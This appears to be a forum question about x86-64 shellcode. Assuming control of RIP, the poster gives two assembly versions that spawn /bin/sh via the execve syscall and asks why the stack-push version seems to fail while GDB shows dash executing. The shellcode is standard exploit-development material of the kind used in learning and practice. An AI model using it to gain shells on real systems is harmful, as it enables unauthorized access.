20Mar
push /bin/sh to get a shell
I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one : Put in case that I can control the RIP and there are no limitations or filters. So I can execute the assembly code as I want.
mov rax, 0x0068732f6e69622f
push rax
push rsp
pop rdi
mov rax ,0x3b
xor rsi, rsi
xor rdx, rdx
syscall
lea rdi, [rip + shell]
mov rax, 0x3b
xor rsi, rsi
xor rdx, rdx
syscall
shell:
.string "/bin/sh"
While I usually use the above one, I don't get why the first one isn't working. I also used GDB to verify and everything seems to be good and in the right positions. In addition to that I also get in dgb:
process 8870 is executing new program: /usr/bin/dash.
Why it doesn't work?
